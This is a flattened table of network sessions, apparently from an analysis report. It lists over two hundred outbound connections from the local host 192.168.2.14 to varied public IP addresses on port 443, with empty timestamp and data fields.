                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20825192.168.2.144401499.156.169.40443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20826192.168.2.14563445.50.141.164443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20827192.168.2.145933647.165.186.64443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20828192.168.2.1460968162.235.69.175443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20829192.168.2.1440500217.175.234.242443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20830192.168.2.1444572147.89.101.188443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20831192.168.2.145580042.210.246.3443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20832192.168.2.1433562216.174.110.120443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20833192.168.2.144675695.247.129.84443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20834192.168.2.143624085.19.106.22443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20835192.168.2.1433112223.238.220.199443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20836192.168.2.1457992216.216.131.164443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20837192.168.2.1451104208.203.85.127443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20838192.168.2.1436866201.227.77.149443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20839192.168.2.145547660.121.230.160443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20840192.168.2.1460496165.54.255.88443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20841192.168.2.144027636.55.190.10443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20842192.168.2.1447148176.249.239.46443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20843192.168.2.1445780119.212.128.60443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20844192.168.2.1439542188.122.4.99443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20845192.168.2.1446028156.119.2.181443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20846192.168.2.14349241.163.167.196443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20847192.168.2.144932845.33.145.63443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20848192.168.2.1433512166.85.207.229443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20849192.168.2.144243458.129.37.244443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20850192.168.2.1443948140.170.14.219443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20851192.168.2.1449422206.177.29.113443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20852192.168.2.1454426176.187.86.104443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20853192.168.2.1460562121.123.219.69443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20854192.168.2.1451974174.35.26.88443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20855192.168.2.1458740212.63.218.7443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20856192.168.2.1441420197.119.250.227443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20857192.168.2.1443992133.25.134.67443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20858192.168.2.143458689.15.192.131443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20859192.168.2.1460754181.128.28.43443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20860192.168.2.145613884.112.155.45443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20861192.168.2.1439636195.141.75.228443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20862192.168.2.1441882114.233.220.156443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20863192.168.2.1436354122.13.4.59443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20864192.168.2.145218254.196.27.144443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20865192.168.2.144550676.100.31.180443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20866192.168.2.1438084176.112.87.126443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20867192.168.2.1457746109.153.133.141443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20868192.168.2.145755486.129.140.235443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20869192.168.2.1455672125.118.24.98443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20870192.168.2.1445428116.23.206.83443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20871192.168.2.1437194153.126.156.236443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20872192.168.2.143418431.36.151.50443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20873192.168.2.1457072143.204.71.195443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20874192.168.2.1439236143.251.176.30443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20875192.168.2.1460432138.97.252.160443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20876192.168.2.144812894.112.50.23443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20877192.168.2.145257060.117.167.215443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20878192.168.2.1436094114.45.142.177443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20879192.168.2.1460314170.113.9.52443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20880192.168.2.144602218.223.201.206443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20881192.168.2.1445248163.26.34.135443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20882192.168.2.1438692128.219.154.46443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20883192.168.2.1458426223.76.240.29443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20884192.168.2.1456318180.189.20.197443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20885192.168.2.1452604106.119.150.162443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20886192.168.2.145374245.181.195.212443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20887192.168.2.144858824.243.45.249443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20888192.168.2.145311885.195.37.123443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20889192.168.2.1459360118.196.191.64443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20890192.168.2.1453008167.224.26.39443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20891192.168.2.1455294207.146.63.205443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20892192.168.2.14486882.45.230.202443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20893192.168.2.1444464119.16.196.216443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20894192.168.2.145900244.12.162.142443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20895192.168.2.145612867.103.9.43443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20896192.168.2.144156098.164.201.182443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20897192.168.2.1456258223.126.180.100443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20898192.168.2.145877887.167.243.21443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20899192.168.2.144856297.90.215.234443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20900192.168.2.145698427.176.93.3443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20901192.168.2.1457296194.178.121.155443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20902192.168.2.1451938142.118.24.3443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20903192.168.2.1455384204.176.41.108443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20904192.168.2.144213835.74.134.118443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20905192.168.2.144566689.59.85.94443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20906192.168.2.1435478187.141.83.194443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20907192.168.2.144208279.234.192.30443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20908192.168.2.1459528188.228.41.26443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20909192.168.2.1440364223.154.62.91443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20910192.168.2.1437062157.135.122.111443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20911192.168.2.144111695.138.155.131443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20912192.168.2.1436958223.224.29.50443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20913192.168.2.1458462108.32.174.90443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20914192.168.2.14553164.45.166.175443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20915192.168.2.143552696.232.135.251443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20916192.168.2.145675650.44.38.74443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20917192.168.2.1435842152.177.98.168443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20918192.168.2.143527267.236.226.123443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20919192.168.2.143798673.228.124.109443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20920192.168.2.1438072167.166.195.85443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20921192.168.2.143880860.231.87.181443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20922192.168.2.1459198143.113.45.141443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20923192.168.2.144415013.62.233.179443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20924192.168.2.14594561.251.173.134443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20925192.168.2.144766641.68.248.4443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20926192.168.2.14533309.21.170.172443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20927192.168.2.14338648.183.60.238443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20928192.168.2.145100293.127.150.192443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20929192.168.2.1447386207.120.167.144443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20930192.168.2.144849475.233.185.230443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20931192.168.2.145967062.92.160.71443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20932192.168.2.1438622132.226.20.21443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20933192.168.2.1438502178.92.247.236443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20934192.168.2.1447636136.254.116.66443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20935192.168.2.1442164204.184.75.96443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20936192.168.2.144222289.16.72.234443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20937192.168.2.144260650.206.35.115443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20938192.168.2.143450450.253.14.3443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20939192.168.2.145331446.69.58.9443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20940192.168.2.1458384122.82.159.82443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20941192.168.2.1442958181.81.129.199443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20942192.168.2.145811654.61.203.186443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20943192.168.2.1457464209.249.230.114443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20944192.168.2.1459742198.219.208.178443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20945192.168.2.14600025.219.146.46443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20946192.168.2.144276087.174.52.157443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20947192.168.2.1449288221.84.39.128443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20948192.168.2.143788818.211.9.27443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20949192.168.2.1459210135.148.103.123443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20950192.168.2.1439082181.75.60.236443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20951192.168.2.145053688.190.16.201443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20952192.168.2.1438638194.60.130.196443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20953192.168.2.1460740190.125.124.67443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20954192.168.2.1433124211.222.40.59443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20955192.168.2.1452564189.57.203.22443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20956192.168.2.1434344202.61.74.127443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20957192.168.2.1451218171.45.63.73443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20958192.168.2.1448724174.25.63.72443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20959192.168.2.1452114143.31.15.137443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20960192.168.2.145801299.31.111.45443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20961192.168.2.143944619.73.184.73443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20962192.168.2.1450858143.218.199.118443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20963192.168.2.145236439.74.238.39443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20964192.168.2.1438372141.70.140.39443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20965192.168.2.143652275.101.9.147443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20966192.168.2.143445635.240.254.163443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20967192.168.2.145199487.68.208.32443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20968192.168.2.1436108105.5.36.6443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20969192.168.2.1449472126.18.81.5443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20970192.168.2.1446182153.177.92.230443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20971192.168.2.1432834165.28.234.97443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20972192.168.2.1454446149.178.208.106443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20973192.168.2.144006886.1.255.157443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20974192.168.2.143348634.78.195.97443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20975192.168.2.1438050186.137.122.134443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20976192.168.2.143996067.228.241.105443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20977192.168.2.143411449.175.6.201443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20978192.168.2.143521627.231.104.141443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20979192.168.2.145872612.149.115.169443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20980192.168.2.14563229.86.243.172443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20981192.168.2.1442640158.224.122.63443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20982192.168.2.1447856164.111.148.254443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20983192.168.2.1435844128.197.193.250443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20984192.168.2.1440854222.194.182.145443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20985192.168.2.145794866.38.166.4443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20986192.168.2.1444938159.248.215.153443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20987192.168.2.1439000122.200.130.194443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20988192.168.2.14594605.92.244.199443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20989192.168.2.145339036.56.137.255443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20990192.168.2.1445036128.236.204.86443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20991192.168.2.1455030108.1.118.109443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20992192.168.2.145776054.231.145.191443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20993192.168.2.1441010221.90.179.153443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20994192.168.2.1440514211.127.139.214443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20995192.168.2.1455090174.180.18.97443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20996192.168.2.145711058.133.68.249443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20997192.168.2.145374614.15.198.138443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20998192.168.2.145580489.10.245.128443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20999192.168.2.1447428123.116.67.10443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21000192.168.2.1445500168.124.4.19443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21001192.168.2.144795467.213.125.71443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21002192.168.2.1458930170.199.133.125443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21003192.168.2.1440794114.5.49.253443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21004192.168.2.144438493.223.204.36443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21005192.168.2.1454094209.150.105.119443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21006192.168.2.146038861.199.254.201443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21007192.168.2.144816281.248.172.30443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21008192.168.2.1439162109.18.108.238443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21009192.168.2.1453720154.100.5.196443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21010192.168.2.1442576145.32.62.174443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21011192.168.2.145935436.242.161.100443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21012192.168.2.144241643.80.149.214443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21013192.168.2.1453724210.237.132.66443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21014192.168.2.1440030124.96.50.138443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21015192.168.2.145193847.248.227.206443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21016192.168.2.144162484.86.81.167443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21017192.168.2.145918623.182.219.56443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21018192.168.2.145098450.43.197.182443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21019192.168.2.145730041.189.251.5443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21020192.168.2.143708243.159.158.100443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21021192.168.2.1460194136.168.128.226443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21022192.168.2.1454090145.58.167.225443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21023192.168.2.1446680138.147.66.250443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21024192.168.2.1440930168.241.190.176443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21025192.168.2.144489284.179.36.251443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21026192.168.2.1451250213.187.162.16443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21027192.168.2.145180219.163.15.245443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21028192.168.2.145802494.110.166.102443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21029192.168.2.1443840139.17.227.115443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21030192.168.2.1456860118.90.9.23443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21031192.168.2.1444770105.241.124.93443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21032192.168.2.145498653.194.25.168443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21033192.168.2.143988077.42.169.173443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21034192.168.2.1436548201.227.137.151443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21035192.168.2.1451798210.213.149.27443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21036192.168.2.1453306204.199.94.22443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
